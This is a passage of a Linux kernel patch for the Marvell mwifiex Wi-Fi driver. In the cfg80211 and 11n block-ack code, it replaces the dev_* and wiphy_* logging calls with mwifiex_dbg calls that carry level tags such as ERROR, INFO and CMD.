false : true; - dev_dbg(priv->adapter->dev, "event: DELBA: %pM tid=%d initiator=%d\n", - peer_mac, tid, initiator); + mwifiex_dbg(priv->adapter, EVENT, "event: DELBA: %pM tid=%d initiator=%d\n", + peer_mac, tid, initiator); if (cleanup_rx_reorder_tbl) { tbl = mwifiex_11n_get_rx_reorder_tbl(priv, tid, peer_mac); if (!tbl) { - dev_dbg(priv->adapter->dev, - "event: TID, TA not found in table\n"); + mwifiex_dbg(priv->adapter, EVENT, + "event: TID, TA not found in table\n"); return; } mwifiex_del_rx_reorder_entry(priv, tbl); } else { ptx_tbl = mwifiex_get_ba_tbl(priv, tid, peer_mac); if (!ptx_tbl) { - dev_dbg(priv->adapter->dev, - "event: TID, RA not found in table\n"); + mwifiex_dbg(priv->adapter, EVENT, + "event: TID, RA not found in table\n"); return; } ra_list = mwifiex_wmm_get_ralist_node(priv, tid, peer_mac); @@ -721,8 +722,8 @@ int mwifiex_ret_11n_addba_resp(struct mwifiex_private *priv, * the stream */ if (le16_to_cpu(add_ba_rsp->status_code) != BA_RESULT_SUCCESS) { - dev_err(priv->adapter->dev, "ADDBA RSP: failed %pM tid=%d)\n", - add_ba_rsp->peer_mac_addr, tid); + mwifiex_dbg(priv->adapter, ERROR, "ADDBA RSP: failed %pM tid=%d)\n", + add_ba_rsp->peer_mac_addr, tid); tbl = mwifiex_11n_get_rx_reorder_tbl(priv, tid, add_ba_rsp->peer_mac_addr); @@ -746,8 +747,8 @@ int mwifiex_ret_11n_addba_resp(struct mwifiex_private *priv, tbl->amsdu = false; } - dev_dbg(priv->adapter->dev, - "cmd: ADDBA RSP: %pM tid=%d ssn=%d win_size=%d\n", + mwifiex_dbg(priv->adapter, CMD, + "cmd: ADDBA RSP: %pM tid=%d ssn=%d win_size=%d\n", add_ba_rsp->peer_mac_addr, tid, add_ba_rsp->ssn, win_size); return 0; diff --git a/drivers/net/wireless/mwifiex/cfg80211.c b/drivers/net/wireless/mwifiex/cfg80211.c index bf9020ff2d33..4eecedadefbf 100644 --- a/drivers/net/wireless/mwifiex/cfg80211.c +++ b/drivers/net/wireless/mwifiex/cfg80211.c @@ -104,11 +104,11 @@ mwifiex_cfg80211_del_key(struct wiphy *wiphy, struct net_device *netdev, const u8 *peer_mac = pairwise ? 
mac_addr : bc_mac; if (mwifiex_set_encode(priv, NULL, NULL, 0, key_index, peer_mac, 1)) { - wiphy_err(wiphy, "deleting the crypto keys\n"); + mwifiex_dbg(priv->adapter, ERROR, "deleting the crypto keys\n"); return -EFAULT; } - wiphy_dbg(wiphy, "info: crypto keys deleted\n"); + mwifiex_dbg(priv->adapter, INFO, "info: crypto keys deleted\n"); return 0; } @@ -163,7 +163,7 @@ mwifiex_cfg80211_mgmt_tx(struct wiphy *wiphy, struct wireless_dev *wdev, struct mwifiex_private *priv = mwifiex_netdev_get_priv(wdev->netdev); if (!buf || !len) { - wiphy_err(wiphy, "invalid buffer and length\n"); + mwifiex_dbg(priv->adapter, ERROR, "invalid buffer and length\n"); return -EFAULT; } @@ -172,8 +172,8 @@ mwifiex_cfg80211_mgmt_tx(struct wiphy *wiphy, struct wireless_dev *wdev, ieee80211_is_probe_resp(mgmt->frame_control)) { /* Since we support offload probe resp, we need to skip probe * resp in AP or GO mode */ - wiphy_dbg(wiphy, - "info: skip to send probe resp in AP or GO mode\n"); + mwifiex_dbg(priv->adapter, INFO, + "info: skip to send probe resp in AP or GO mode\n"); return 0; } @@ -183,7 +183,8 @@ mwifiex_cfg80211_mgmt_tx(struct wiphy *wiphy, struct wireless_dev *wdev, pkt_len + sizeof(pkt_len)); if (!skb) { - wiphy_err(wiphy, "allocate skb failed for management frame\n"); + mwifiex_dbg(priv->adapter, ERROR, + "allocate skb failed for management frame\n"); return -ENOMEM; } @@ -206,7 +207,7 @@ mwifiex_cfg80211_mgmt_tx(struct wiphy *wiphy, struct wireless_dev *wdev, mwifiex_queue_tx_pkt(priv, skb); - wiphy_dbg(wiphy, "info: management frame transmitted\n"); + mwifiex_dbg(priv->adapter, INFO, "info: management frame transmitted\n"); return 0; } @@ -231,7 +232,7 @@ mwifiex_cfg80211_mgmt_frame_register(struct wiphy *wiphy, mwifiex_send_cmd(priv, HostCmd_CMD_MGMT_FRAME_REG, HostCmd_ACT_GEN_SET, 0, &priv->mgmt_frame_mask, false); - wiphy_dbg(wiphy, "info: mgmt frame registered\n"); + mwifiex_dbg(priv->adapter, INFO, "info: mgmt frame registered\n"); } } @@ -248,13 +249,14 @@ mwifiex_cfg80211_remain_on_channel(struct wiphy *wiphy, int ret; if (!chan || !cookie) { - wiphy_err(wiphy, "Invalid parameter for ROC\n"); + mwifiex_dbg(priv->adapter, ERROR, "Invalid parameter for ROC\n"); return -EINVAL; } if (priv->roc_cfg.cookie) { - wiphy_dbg(wiphy, "info: ongoing ROC, cookie = 0x%llx\n", - priv->roc_cfg.cookie); + mwifiex_dbg(priv->adapter, INFO, + "info: ongoing ROC, cookie = 0x%llx\n", + priv->roc_cfg.cookie); return -EBUSY; } @@ -269,7 +271,8 @@ mwifiex_cfg80211_remain_on_channel(struct wiphy *wiphy, cfg80211_ready_on_channel(wdev, *cookie, chan, duration, GFP_ATOMIC); - wiphy_dbg(wiphy, "info: ROC, cookie = 0x%llx\n", *cookie); + mwifiex_dbg(priv->adapter, INFO, + "info: ROC, cookie = 0x%llx\n", *cookie); } return ret; @@ -298,7 +301,8 @@ mwifiex_cfg80211_cancel_remain_on_channel(struct wiphy *wiphy, memset(&priv->roc_cfg, 0, sizeof(struct mwifiex_roc_cfg)); - wiphy_dbg(wiphy, "info: cancel ROC, cookie = 0x%llx\n", cookie); + mwifiex_dbg(priv->adapter, INFO, + "info: cancel ROC, cookie = 0x%llx\n", cookie); } return ret; @@ -344,8 +348,8 @@ mwifiex_cfg80211_set_power_mgmt(struct wiphy *wiphy, u32 ps_mode; if (timeout) - wiphy_dbg(wiphy, - "info: ignore timeout value for IEEE Power Save\n"); + mwifiex_dbg(priv->adapter, INFO, + "info: ignore timeout value for IEEE Power Save\n"); ps_mode = enabled; @@ -370,7 +374,7 @@ mwifiex_cfg80211_set_default_key(struct wiphy *wiphy, struct net_device *netdev, priv->wep_key_curr_index = key_index; } else if (mwifiex_set_encode(priv, NULL, NULL, 0, key_index, NULL, 0)) { - 
wiphy_err(wiphy, "set default Tx key index\n"); + mwifiex_dbg(priv->adapter, ERROR, "set default Tx key index\n"); return -EFAULT; } @@ -407,7 +411,7 @@ mwifiex_cfg80211_add_key(struct wiphy *wiphy, struct net_device *netdev, if (mwifiex_set_encode(priv, params, params->key, params->key_len, key_index, peer_mac, 0)) { - wiphy_err(wiphy, "crypto keys added\n"); + mwifiex_dbg(priv->adapter, ERROR, "crypto keys added\n"); return -EFAULT; } @@ -442,7 +446,8 @@ static int mwifiex_send_domain_info_cmd_fw(struct wiphy *wiphy) band = mwifiex_band_to_radio_type(adapter->config_bands); if (!wiphy->bands[band]) { - wiphy_err(wiphy, "11D: setting domain info in FW\n"); + mwifiex_dbg(adapter, ERROR, + "11D: setting domain info in FW\n"); return -1; } @@ -493,7 +498,8 @@ static int mwifiex_send_domain_info_cmd_fw(struct wiphy *wiphy) if (mwifiex_send_cmd(priv, HostCmd_CMD_802_11D_DOMAIN_INFO, HostCmd_ACT_GEN_SET, 0, NULL, false)) { - wiphy_err(wiphy, "11D: setting domain info in FW\n"); + mwifiex_dbg(adapter, INFO, + "11D: setting domain info in FW\n"); return -1; } @@ -516,9 +522,9 @@ static void mwifiex_reg_notifier(struct wiphy *wiphy, struct mwifiex_adapter *adapter = mwifiex_cfg80211_get_adapter(wiphy); struct mwifiex_private *priv = mwifiex_get_priv(adapter, MWIFIEX_BSS_ROLE_ANY); - - wiphy_dbg(wiphy, "info: cfg80211 regulatory domain callback for %c%c\n", - request->alpha2[0], request->alpha2[1]); + mwifiex_dbg(adapter, INFO, + "info: cfg80211 regulatory domain callback for %c%c\n", + request->alpha2[0], request->alpha2[1]); switch (request->initiator) { case NL80211_REGDOM_SET_BY_DRIVER: @@ -527,8 +533,9 @@ static void mwifiex_reg_notifier(struct wiphy *wiphy, case NL80211_REGDOM_SET_BY_COUNTRY_IE: break; default: - wiphy_err(wiphy, "unknown regdom initiator: %d\n", - request->initiator); + mwifiex_dbg(adapter, ERROR, + "unknown regdom initiator: %d\n", + request->initiator); return; } @@ -597,8 +604,8 @@ mwifiex_cfg80211_set_wiphy_params(struct wiphy *wiphy, u32 changed) switch (priv->bss_role) { case MWIFIEX_BSS_ROLE_UAP: if (priv->bss_started) { - dev_err(adapter->dev, - "cannot change wiphy params when bss started"); + mwifiex_dbg(adapter, ERROR, + "cannot change wiphy params when bss started"); return -EINVAL; } @@ -622,15 +629,16 @@ mwifiex_cfg80211_set_wiphy_params(struct wiphy *wiphy, u32 changed) kfree(bss_cfg); if (ret) { - wiphy_err(wiphy, "Failed to set wiphy phy params\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to set wiphy phy params\n"); return ret; } break; case MWIFIEX_BSS_ROLE_STA: if (priv->media_connected) { - dev_err(adapter->dev, - "cannot change wiphy params when connected"); + mwifiex_dbg(adapter, ERROR, + "cannot change wiphy params when connected"); return -EINVAL; } if (changed & WIPHY_PARAM_RTS_THRESHOLD) { @@ -724,8 +732,8 @@ static int mwifiex_deinit_priv_params(struct mwifiex_private *priv) if (mwifiex_send_cmd(priv, HostCmd_CMD_MGMT_FRAME_REG, HostCmd_ACT_GEN_SET, 0, &priv->mgmt_frame_mask, false)) { - dev_warn(priv->adapter->dev, - "could not unregister mgmt frame rx\n"); + mwifiex_dbg(adapter, ERROR, + "could not unregister mgmt frame rx\n"); return -1; } @@ -789,9 +797,9 @@ mwifiex_init_new_priv_params(struct mwifiex_private *priv, priv->bss_role = MWIFIEX_BSS_ROLE_UAP; break; default: - dev_err(priv->adapter->dev, - "%s: changing to %d not supported\n", - dev->name, type); + mwifiex_dbg(adapter, ERROR, + "%s: changing to %d not supported\n", + dev->name, type); return -EOPNOTSUPP; } @@ -824,12 +832,13 @@ mwifiex_change_vif_to_p2p(struct net_device *dev, if 
(adapter->curr_iface_comb.p2p_intf == adapter->iface_limit.p2p_intf) { - dev_err(adapter->dev, - "cannot create multiple P2P ifaces\n"); + mwifiex_dbg(adapter, ERROR, + "cannot create multiple P2P ifaces\n"); return -1; } - dev_dbg(priv->adapter->dev, "%s: changing role to p2p\n", dev->name); + mwifiex_dbg(adapter, INFO, + "%s: changing role to p2p\n", dev->name); if (mwifiex_deinit_priv_params(priv)) return -1; @@ -846,9 +855,9 @@ mwifiex_change_vif_to_p2p(struct net_device *dev, return -EFAULT; break; default: - dev_err(priv->adapter->dev, - "%s: changing to %d not supported\n", - dev->name, type); + mwifiex_dbg(adapter, ERROR, + "%s: changing to %d not supported\n", + dev->name, type); return -EOPNOTSUPP; } @@ -897,17 +906,17 @@ mwifiex_change_vif_to_sta_adhoc(struct net_device *dev, curr_iftype != NL80211_IFTYPE_P2P_GO) && (adapter->curr_iface_comb.sta_intf == adapter->iface_limit.sta_intf)) { - dev_err(adapter->dev, - "cannot create multiple station/adhoc ifaces\n"); + mwifiex_dbg(adapter, ERROR, + "cannot create multiple station/adhoc ifaces\n"); return -1; } if (type == NL80211_IFTYPE_STATION) - dev_notice(adapter->dev, - "%s: changing role to station\n", dev->name); + mwifiex_dbg(adapter, INFO, + "%s: changing role to station\n", dev->name); else - dev_notice(adapter->dev, - "%s: changing role to adhoc\n", dev->name); + mwifiex_dbg(adapter, INFO, + "%s: changing role to adhoc\n", dev->name); if (mwifiex_deinit_priv_params(priv)) return -1; @@ -954,12 +963,13 @@ mwifiex_change_vif_to_ap(struct net_device *dev, if (adapter->curr_iface_comb.uap_intf == adapter->iface_limit.uap_intf) { - dev_err(adapter->dev, - "cannot create multiple AP ifaces\n"); + mwifiex_dbg(adapter, ERROR, + "cannot create multiple AP ifaces\n"); return -1; } - dev_notice(adapter->dev, "%s: changing role to AP\n", dev->name); + mwifiex_dbg(adapter, INFO, + "%s: changing role to AP\n", dev->name); if (mwifiex_deinit_priv_params(priv)) return -1; @@ -1020,12 +1030,14 @@ mwifiex_cfg80211_change_virtual_intf(struct wiphy *wiphy, return mwifiex_change_vif_to_ap(dev, curr_iftype, type, flags, params); case NL80211_IFTYPE_UNSPECIFIED: - wiphy_warn(wiphy, "%s: kept type as IBSS\n", dev->name); + mwifiex_dbg(priv->adapter, INFO, + "%s: kept type as IBSS\n", dev->name); case NL80211_IFTYPE_ADHOC: /* This shouldn't happen */ return 0; default: - wiphy_err(wiphy, "%s: changing to %d not supported\n", - dev->name, type); + mwifiex_dbg(priv->adapter, ERROR, + "%s: changing to %d not supported\n", + dev->name, type); return -EOPNOTSUPP; } break; @@ -1048,12 +1060,14 @@ mwifiex_cfg80211_change_virtual_intf(struct wiphy *wiphy, return mwifiex_change_vif_to_ap(dev, curr_iftype, type, flags, params); case NL80211_IFTYPE_UNSPECIFIED: - wiphy_warn(wiphy, "%s: kept type as STA\n", dev->name); + mwifiex_dbg(priv->adapter, INFO, + "%s: kept type as STA\n", dev->name); case NL80211_IFTYPE_STATION: /* This shouldn't happen */ return 0; default: - wiphy_err(wiphy, "%s: changing to %d not supported\n", - dev->name, type); + mwifiex_dbg(priv->adapter, ERROR, + "%s: changing to %d not supported\n", + dev->name, type); return -EOPNOTSUPP; } break; @@ -1070,12 +1084,14 @@ mwifiex_cfg80211_change_virtual_intf(struct wiphy *wiphy, return mwifiex_change_vif_to_p2p(dev, curr_iftype, type, flags, params); case NL80211_IFTYPE_UNSPECIFIED: - wiphy_warn(wiphy, "%s: kept type as AP\n", dev->name); + mwifiex_dbg(priv->adapter, INFO, + "%s: kept type as AP\n", dev->name); case NL80211_IFTYPE_AP: /* This shouldn't happen */ return 0; default: - 
wiphy_err(wiphy, "%s: changing to %d not supported\n", - dev->name, type); + mwifiex_dbg(priv->adapter, ERROR, + "%s: changing to %d not supported\n", + dev->name, type); return -EOPNOTSUPP; } break; @@ -1100,19 +1116,22 @@ mwifiex_cfg80211_change_virtual_intf(struct wiphy *wiphy, return mwifiex_change_vif_to_ap(dev, curr_iftype, type, flags, params); case NL80211_IFTYPE_UNSPECIFIED: - wiphy_warn(wiphy, "%s: kept type as P2P\n", dev->name); + mwifiex_dbg(priv->adapter, INFO, + "%s: kept type as P2P\n", dev->name); case NL80211_IFTYPE_P2P_CLIENT: case NL80211_IFTYPE_P2P_GO: return 0; default: - wiphy_err(wiphy, "%s: changing to %d not supported\n", - dev->name, type); + mwifiex_dbg(priv->adapter, ERROR, + "%s: changing to %d not supported\n", + dev->name, type); return -EOPNOTSUPP; } break; default: - wiphy_err(wiphy, "%s: unknown iftype: %d\n", - dev->name, dev->ieee80211_ptr->iftype); + mwifiex_dbg(priv->adapter, ERROR, + "%s: unknown iftype: %d\n", + dev->name, dev->ieee80211_ptr->iftype); return -EOPNOTSUPP; } @@ -1206,12 +1225,14 @@ mwifiex_dump_station_info(struct mwifiex_private *priv, /* Get signal information from the firmware */ if (mwifiex_send_cmd(priv, HostCmd_CMD_RSSI_INFO, HostCmd_ACT_GEN_GET, 0, NULL, true)) { - dev_err(priv->adapter->dev, "failed to get signal information\n"); + mwifiex_dbg(priv->adapter, ERROR, + "failed to get signal information\n"); return -EFAULT; } if (mwifiex_drv_get_data_rate(priv, &rate)) { - dev_err(priv->adapter->dev, "getting data rate\n"); + mwifiex_dbg(priv->adapter, ERROR, + "getting data rate error\n"); return -EFAULT; } @@ -1295,7 +1316,7 @@ mwifiex_cfg80211_dump_survey(struct wiphy *wiphy, struct net_device *dev, struct mwifiex_chan_stats *pchan_stats = priv->adapter->chan_stats; enum ieee80211_band band; - dev_dbg(priv->adapter->dev, "dump_survey idx=%d\n", idx); + mwifiex_dbg(priv->adapter, DUMP, "dump_survey idx=%d\n", idx); memset(survey, 0, sizeof(struct survey_info)); @@ -1472,8 +1493,8 @@ static int mwifiex_cfg80211_set_bitrate_mask(struct wiphy *wiphy, struct mwifiex_adapter *adapter = priv->adapter; if (!priv->media_connected) { - dev_err(adapter->dev, - "Can not set Tx data rate in disconnected state\n"); + mwifiex_dbg(adapter, ERROR, + "Can not set Tx data rate in disconnected state\n"); return -EINVAL; } @@ -1556,17 +1577,20 @@ static int mwifiex_cfg80211_change_beacon(struct wiphy *wiphy, struct mwifiex_private *priv = mwifiex_netdev_get_priv(dev); if (GET_BSS_ROLE(priv) != MWIFIEX_BSS_ROLE_UAP) { - wiphy_err(wiphy, "%s: bss_type mismatched\n", __func__); + mwifiex_dbg(priv->adapter, ERROR, + "%s: bss_type mismatched\n", __func__); return -EINVAL; } if (!priv->bss_started) { - wiphy_err(wiphy, "%s: bss not started\n", __func__); + mwifiex_dbg(priv->adapter, ERROR, + "%s: bss not started\n", __func__); return -EINVAL; } if (mwifiex_set_mgmt_ies(priv, data)) { - wiphy_err(wiphy, "%s: setting mgmt ies failed\n", __func__); + mwifiex_dbg(priv->adapter, ERROR, + "%s: setting mgmt ies failed\n", __func__); return -EFAULT; } @@ -1594,7 +1618,8 @@ mwifiex_cfg80211_del_station(struct wiphy *wiphy, struct net_device *dev, if (!params->mac || is_broadcast_ether_addr(params->mac)) return 0; - wiphy_dbg(wiphy, "%s: mac address %pM\n", __func__, params->mac); + mwifiex_dbg(priv->adapter, INFO, "%s: mac address %pM\n", + __func__, params->mac); eth_zero_addr(deauth_mac); @@ -1687,14 +1712,16 @@ static int mwifiex_cfg80211_stop_ap(struct wiphy *wiphy, struct net_device *dev) mwifiex_abort_cac(priv); if (mwifiex_del_mgmt_ies(priv)) - 
wiphy_err(wiphy, "Failed to delete mgmt IEs!\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to delete mgmt IEs!\n"); priv->ap_11n_enabled = 0; memset(&priv->bss_cfg, 0, sizeof(priv->bss_cfg)); if (mwifiex_send_cmd(priv, HostCmd_CMD_UAP_BSS_STOP, HostCmd_ACT_GEN_SET, 0, NULL, true)) { - wiphy_err(wiphy, "Failed to stop the BSS\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to stop the BSS\n"); return -1; } @@ -1756,7 +1783,8 @@ static int mwifiex_cfg80211_start_ap(struct wiphy *wiphy, if (mwifiex_set_secure_params(priv, bss_cfg, params)) { kfree(bss_cfg); - wiphy_err(wiphy, "Failed to parse secuirty parameters!\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to parse secuirty parameters!\n"); return -1; } @@ -1778,17 +1806,19 @@ static int mwifiex_cfg80211_start_ap(struct wiphy *wiphy, if (mwifiex_is_11h_active(priv) && !cfg80211_chandef_dfs_required(wiphy, ¶ms->chandef, priv->bss_mode)) { - dev_dbg(priv->adapter->dev, "Disable 11h extensions in FW\n"); + mwifiex_dbg(priv->adapter, INFO, + "Disable 11h extensions in FW\n"); if (mwifiex_11h_activate(priv, false)) { - dev_err(priv->adapter->dev, - "Failed to disable 11h extensions!!"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to disable 11h extensions!!"); return -1; } priv->state_11h.is_11h_active = true; } if (mwifiex_config_start_uap(priv, bss_cfg)) { - wiphy_err(wiphy, "Failed to start AP\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to start AP\n"); kfree(bss_cfg); return -1; } @@ -1816,8 +1846,9 @@ mwifiex_cfg80211_disconnect(struct wiphy *wiphy, struct net_device *dev, if (mwifiex_deauthenticate(priv, NULL)) return -EFAULT; - wiphy_dbg(wiphy, "info: successfully disconnected from %pM:" - " reason code %d\n", priv->cfg_bssid, reason_code); + mwifiex_dbg(priv->adapter, MSG, + "info: successfully disconnected from %pM:\t" + "reason code %d\n", priv->cfg_bssid, reason_code); eth_zero_addr(priv->cfg_bssid); priv->hs2_enabled = false; @@ -1899,13 +1930,13 @@ mwifiex_cfg80211_assoc(struct mwifiex_private *priv, size_t ssid_len, req_ssid.ssid_len = ssid_len; if (ssid_len > IEEE80211_MAX_SSID_LEN) { - dev_err(priv->adapter->dev, "invalid SSID - aborting\n"); + mwifiex_dbg(priv->adapter, ERROR, "invalid SSID - aborting\n"); return -EINVAL; } memcpy(req_ssid.ssid, ssid, ssid_len); if (!req_ssid.ssid_len || req_ssid.ssid[0] < 0x20) { - dev_err(priv->adapter->dev, "invalid SSID - aborting\n"); + mwifiex_dbg(priv->adapter, ERROR, "invalid SSID - aborting\n"); return -EINVAL; } @@ -1959,9 +1990,9 @@ mwifiex_cfg80211_assoc(struct mwifiex_private *priv, size_t ssid_len, if (sme->key) { if (mwifiex_is_alg_wep(priv->sec_info.encryption_mode)) { - dev_dbg(priv->adapter->dev, - "info: setting wep encryption" - " with key len %d\n", sme->key_len); + mwifiex_dbg(priv->adapter, INFO, + "info: setting wep encryption\t" + "with key len %d\n", sme->key_len); priv->wep_key_curr_index = sme->key_idx; ret = mwifiex_set_encode(priv, NULL, sme->key, sme->key_len, sme->key_idx, @@ -1978,7 +2009,7 @@ mwifiex_cfg80211_assoc(struct mwifiex_private *priv, size_t ssid_len, if (is_scanning_required) { /* Do specific SSID scanning */ if (mwifiex_request_scan(priv, &req_ssid)) { - dev_err(priv->adapter->dev, "scan error\n"); + mwifiex_dbg(priv->adapter, ERROR, "scan error\n"); return -EFAULT; } } @@ -1997,15 +2028,15 @@ mwifiex_cfg80211_assoc(struct mwifiex_private *priv, size_t ssid_len, if (!bss) { if (is_scanning_required) { - dev_warn(priv->adapter->dev, - "assoc: requested bss not found in scan results\n"); + mwifiex_dbg(priv->adapter, WARN, + 
"assoc: requested bss not found in scan results\n"); break; } is_scanning_required = 1; } else { - dev_dbg(priv->adapter->dev, - "info: trying to associate to '%s' bssid %pM\n", - (char *) req_ssid.ssid, bss->bssid); + mwifiex_dbg(priv->adapter, MSG, + "info: trying to associate to '%s' bssid %pM\n", + (char *)req_ssid.ssid, bss->bssid); memcpy(&priv->cfg_bssid, bss->bssid, ETH_ALEN); break; } @@ -2041,26 +2072,29 @@ mwifiex_cfg80211_connect(struct wiphy *wiphy, struct net_device *dev, int ret; if (GET_BSS_ROLE(priv) != MWIFIEX_BSS_ROLE_STA) { - wiphy_err(wiphy, - "%s: reject infra assoc request in non-STA role\n", - dev->name); + mwifiex_dbg(adapter, ERROR, + "%s: reject infra assoc request in non-STA role\n", + dev->name); return -EINVAL; } if (priv->wdev.current_bss) { - wiphy_warn(wiphy, "%s: already connected\n", dev->name); + mwifiex_dbg(adapter, ERROR, + "%s: already connected\n", dev->name); return -EALREADY; } if (adapter->surprise_removed || adapter->is_cmd_timedout) { - wiphy_err(wiphy, - "%s: Ignore connection. Card removed or FW in bad state\n", - dev->name); + mwifiex_dbg(adapter, ERROR, + "%s: Ignore connection.\t" + "Card removed or FW in bad state\n", + dev->name); return -EFAULT; } - wiphy_dbg(wiphy, "info: Trying to associate to %s and bssid %pM\n", - (char *) sme->ssid, sme->bssid); + mwifiex_dbg(adapter, INFO, + "info: Trying to associate to %s and bssid %pM\n", + (char *)sme->ssid, sme->bssid); ret = mwifiex_cfg80211_assoc(priv, sme->ssid_len, sme->ssid, sme->bssid, priv->bss_mode, sme->channel, sme, 0); @@ -2068,17 +2102,17 @@ mwifiex_cfg80211_connect(struct wiphy *wiphy, struct net_device *dev, cfg80211_connect_result(priv->netdev, priv->cfg_bssid, NULL, 0, NULL, 0, WLAN_STATUS_SUCCESS, GFP_KERNEL); - dev_dbg(priv->adapter->dev, - "info: associated to bssid %pM successfully\n", - priv->cfg_bssid); + mwifiex_dbg(priv->adapter, MSG, + "info: associated to bssid %pM successfully\n", + priv->cfg_bssid); if (ISSUPP_TDLS_ENABLED(priv->adapter->fw_cap_info) && priv->adapter->auto_tdls && priv->bss_type == MWIFIEX_BSS_TYPE_STA) mwifiex_setup_auto_tdls_timer(priv); } else { - dev_dbg(priv->adapter->dev, - "info: association to bssid %pM failed\n", - priv->cfg_bssid); + mwifiex_dbg(priv->adapter, ERROR, + "info: association to bssid %pM failed\n", + priv->cfg_bssid); eth_zero_addr(priv->cfg_bssid); if (ret > 0) @@ -2105,7 +2139,6 @@ mwifiex_cfg80211_connect(struct wiphy *wiphy, struct net_device *dev, static int mwifiex_set_ibss_params(struct mwifiex_private *priv, struct cfg80211_ibss_params *params) { - struct wiphy *wiphy = priv->wdev.wiphy; struct mwifiex_adapter *adapter = priv->adapter; int index = 0, i; u8 config_bands = 0; @@ -2162,8 +2195,10 @@ static int mwifiex_set_ibss_params(struct mwifiex_private *priv, priv->adhoc_channel = ieee80211_frequency_to_channel( params->chandef.chan->center_freq); - wiphy_dbg(wiphy, "info: set ibss band %d, chan %d, chan offset %d\n", - config_bands, priv->adhoc_channel, adapter->sec_chan_offset); + mwifiex_dbg(adapter, INFO, + "info: set ibss band %d, chan %d, chan offset %d\n", + config_bands, priv->adhoc_channel, + adapter->sec_chan_offset); return 0; } @@ -2182,13 +2217,15 @@ mwifiex_cfg80211_join_ibss(struct wiphy *wiphy, struct net_device *dev, int ret = 0; if (priv->bss_mode != NL80211_IFTYPE_ADHOC) { - wiphy_err(wiphy, "request to join ibss received " - "when station is not in ibss mode\n"); + mwifiex_dbg(priv->adapter, ERROR, + "request to join ibss received\t" + "when station is not in ibss mode\n"); goto done; } - 
wiphy_dbg(wiphy, "info: trying to join to %s and bssid %pM\n", - (char *) params->ssid, params->bssid); + mwifiex_dbg(priv->adapter, MSG, + "info: trying to join to %s and bssid %pM\n", + (char *)params->ssid, params->bssid); mwifiex_set_ibss_params(priv, params); @@ -2200,12 +2237,12 @@ mwifiex_cfg80211_join_ibss(struct wiphy *wiphy, struct net_device *dev, if (!ret) { cfg80211_ibss_joined(priv->netdev, priv->cfg_bssid, params->chandef.chan, GFP_KERNEL); - dev_dbg(priv->adapter->dev, - "info: joined/created adhoc network with bssid" - " %pM successfully\n", priv->cfg_bssid); + mwifiex_dbg(priv->adapter, MSG, + "info: joined/created adhoc network with bssid\t" + "%pM successfully\n", priv->cfg_bssid); } else { - dev_dbg(priv->adapter->dev, - "info: failed creating/joining adhoc network\n"); + mwifiex_dbg(priv->adapter, ERROR, + "info: failed creating/joining adhoc network\n"); } return ret; @@ -2222,8 +2259,8 @@ mwifiex_cfg80211_leave_ibss(struct wiphy *wiphy, struct net_device *dev) { struct mwifiex_private *priv = mwifiex_netdev_get_priv(dev); - wiphy_dbg(wiphy, "info: disconnecting from essid %pM\n", - priv->cfg_bssid); + mwifiex_dbg(priv->adapter, MSG, "info: disconnecting from essid %pM\n", + priv->cfg_bssid); if (mwifiex_deauthenticate(priv, NULL)) return -EFAULT; @@ -2250,13 +2287,15 @@ mwifiex_cfg80211_scan(struct wiphy *wiphy, struct ieee_types_header *ie; struct mwifiex_user_scan_cfg *user_scan_cfg; - wiphy_dbg(wiphy, "info: received scan request on %s\n", dev->name); + mwifiex_dbg(priv->adapter, CMD, + "info: received scan request on %s\n", dev->name); /* Block scan request if scan operation or scan cleanup when interface * is disabled is in process */ if (priv->scan_request || priv->scan_aborting) { - dev_err(priv->adapter->dev, "cmd: Scan already in process..\n"); + mwifiex_dbg(priv->adapter, WARN, + "cmd: Scan already in process..\n"); return -EBUSY; } @@ -2308,7 +2347,8 @@ mwifiex_cfg80211_scan(struct wiphy *wiphy, ret = mwifiex_scan_networks(priv, user_scan_cfg); kfree(user_scan_cfg); if (ret) { - dev_err(priv->adapter->dev, "scan failed: %d\n", ret); + mwifiex_dbg(priv->adapter, ERROR, + "scan failed: %d\n", ret); priv->scan_aborting = false; priv->scan_request = NULL; return ret; @@ -2454,15 +2494,15 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, case NL80211_IFTYPE_ADHOC: if (adapter->curr_iface_comb.sta_intf == adapter->iface_limit.sta_intf) { - wiphy_err(wiphy, - "cannot create multiple sta/adhoc ifaces\n"); + mwifiex_dbg(adapter, ERROR, + "cannot create multiple sta/adhoc ifaces\n"); return ERR_PTR(-EINVAL); } priv = mwifiex_get_unused_priv(adapter); if (!priv) { - wiphy_err(wiphy, - "could not get free private struct\n"); + mwifiex_dbg(adapter, ERROR, + "could not get free private struct\n"); return ERR_PTR(-EFAULT); } @@ -2484,15 +2524,15 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, case NL80211_IFTYPE_AP: if (adapter->curr_iface_comb.uap_intf == adapter->iface_limit.uap_intf) { - wiphy_err(wiphy, - "cannot create multiple AP ifaces\n"); + mwifiex_dbg(adapter, ERROR, + "cannot create multiple AP ifaces\n"); return ERR_PTR(-EINVAL); } priv = mwifiex_get_unused_priv(adapter); if (!priv) { - wiphy_err(wiphy, - "could not get free private struct\n"); + mwifiex_dbg(adapter, ERROR, + "could not get free private struct\n"); return ERR_PTR(-EFAULT); } @@ -2511,15 +2551,15 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, case NL80211_IFTYPE_P2P_CLIENT: if (adapter->curr_iface_comb.p2p_intf == 
